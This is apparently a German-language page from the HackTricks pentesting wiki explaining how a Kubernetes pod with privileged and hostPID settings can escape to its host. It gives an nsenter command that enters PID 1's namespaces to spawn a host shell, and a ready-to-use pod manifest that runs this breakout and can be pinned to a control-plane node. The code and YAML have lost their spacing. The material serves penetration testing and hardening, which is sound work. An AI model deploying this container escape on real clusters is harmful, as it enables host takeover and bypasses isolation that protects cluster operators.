Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an dieHackTricks und HackTricks Cloud Github-Repositorys einreichen.
Privileged and hostPID
Mit diesen Berechtigungen haben Sie Zugriff auf die Prozesse des Hosts und ausreichende Berechtigungen, um in den Namespace eines der Host-Prozesse einzutreten.
Beachten Sie, dass Sie möglicherweise nicht unbedingt privilegiert sein müssen, sondern nur einige Fähigkeiten und andere potenzielle Abwehrmechanismen umgehen müssen (wie AppArmor und/oder Seccomp).
Das Ausführen von etwas Ähnlichem wie dem Folgenden ermöglicht es Ihnen, aus dem Pod auszubrechen:
nsenter--target1--mount--uts--ipc--net--pid--bash
Konfigurationsbeispiel:
apiVersion:v1kind:Podmetadata:name:priv-and-hostpid-exec-podlabels:app:pentestspec:hostPID:truecontainers:- name:priv-and-hostpid-podimage:ubuntutty:truesecurityContext:privileged:truecommand: [ "nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash" ]#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name